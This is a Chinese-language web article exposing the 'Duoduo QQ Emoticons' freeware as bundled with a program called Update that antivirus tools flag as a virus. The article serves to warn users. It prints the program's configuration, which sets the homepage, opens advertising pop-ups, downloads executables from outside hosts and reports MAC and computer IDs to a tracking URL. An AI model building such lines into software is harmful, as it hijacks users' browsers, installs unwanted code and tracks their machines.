真相:公開捆綁傳播,被指暗藏病毒
在百度上搜索“QQ表情”,找到相關(guān)網(wǎng)頁約1,660,000篇,搜索“多多QQ表情”,找到相關(guān)網(wǎng)頁約660,000篇,通過這簡單的計算,多多QQ表情擁有QQ表情市場近40%的市場占有率。那么這款有著驚人市場占有率的軟件到底是一款什么樣的軟件呢?
根據(jù)其官方介紹,多多QQ表情是一款專門為騰訊QQ用戶打造的免費軟件,提供超炫QQ表情,點擊就能導(dǎo)入QQ表情中,導(dǎo)入完畢就能在QQ聊天時使用,豐富您的對話。同時QQ表情還向軟件作者和站長開出了價碼,稱將按0.05元一個的價格與軟件捆綁,且特別聲明,在安裝成功后在添加刪除程序中可以看到“多多QQ表情”選項,可自由卸載。
真相到底是怎樣呢?在百度里,筆者發(fā)現(xiàn)得更多的卻是和求助電話里類似的內(nèi)容。見圖1:
圖1
同時,筆者向一位做安全的朋友求助,他稱,多多QQ表情雖然只有47K,而且表面上可挾載,但它確捆綁了另一個叫Update的病毒。而這已經(jīng)大大超出了之前大家所定義的流氓軟件的范疇,因為,在諾頓和瑞星里,大家已經(jīng)將UPDATE定義成了病毒。
諾頓對QQ表情主程序的認(rèn)定:
瑞星對QQ表情的認(rèn)定:
超級兔子對多多QQ表情的認(rèn)定:
對UPDATE的分析
顯性動作
[SetHomePage] Url=http://www.9991.com/
[PopupIE] Url=http://www.chanet.com.cn/click.cgi?a=6606&d=3086&u=
[PopupIE] Url=http://www.b2b2.net/51gg/index.html
[PopupIE] Url=http://www.7MP3.com
[PopupIE] Url=http://www.600001.com/
[PopupIE] Url=http://www.600005.com/
隱性動作
[Actions]訪問 Url=http://file.qqhelper.com/up/update.dat
[Update]升級 Url=http://www.yulexingkong.com/mop/uninstalldrv.exe
[Update] Url=http://www.ha0l23.com/softbaby/uninstalltmp.exe
[Update] Url=http://#qqhelper.com/tj/tj?setupid=$(setupid)&mac=$(computerid)&type=$(sendflag)&version=$(version)&exeversion=$(exeversion)&setupdate=$(setupdate)
在機器生成以下目錄以及文件:
C:\Program Files\Common Files\UPDATE
update.dat
update.exe
以上動作都是update.exe干的
另外生成一個目錄以及文件:
C:\Program Files\Common Files\SAND
updatesr.ini
svr.dat
qqfacerclient.exe
twunk_8.exe
還沒有看到具體動作,有潛伏期。
關(guān)于騰牛 | 聯(lián)系方式 | 發(fā)展歷程 | 版權(quán)聲明 | 下載幫助(?) | 廣告聯(lián)系 | 網(wǎng)站地圖 | 友情鏈接
Copyright 2005-2018 QQTN.com 【騰牛網(wǎng)】 版權(quán)所有 鄂ICP備17010784號-1 | 鄂公網(wǎng)安備 42011102000245號
聲明: 本站非騰訊QQ官方網(wǎng)站 所有軟件和文章來自互聯(lián)網(wǎng) 如有異議 請與本站聯(lián)系 本站為非贏利性網(wǎng)站 不接受任何贊助和廣告